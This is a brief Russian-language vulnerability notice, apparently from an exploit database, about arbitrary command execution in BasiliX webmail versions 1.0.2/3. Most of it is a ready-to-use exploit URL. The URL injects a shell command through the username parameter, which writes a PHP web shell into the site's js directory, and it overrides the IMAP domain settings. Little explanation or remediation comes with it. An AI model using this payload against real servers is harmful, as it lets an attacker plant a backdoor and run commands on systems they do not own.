BasiliX — webmail приложение, основанное на PHP и IMAP, работающее с MySQL. Уязвимость в программе позволяет выполнять произвольные команды.

Уязвимая система: BasiliX версия 1.0.2/3

Эксплоит

victim.host/basilix.php3?username=blah;echo%20" <?system(\$cmd);?>">js/blah.php&
password=blah&RequestID=LOGIN&domain= blah&bsx_domains[blah][imap_host]=blah.com.pl&
bsx_domains[blah][imap_port]=143&bsx_domains [blah][domain]=su.th3_tick&nocookie=1&
BSX_TestCookie=1&SESSID=1

Оставить мнение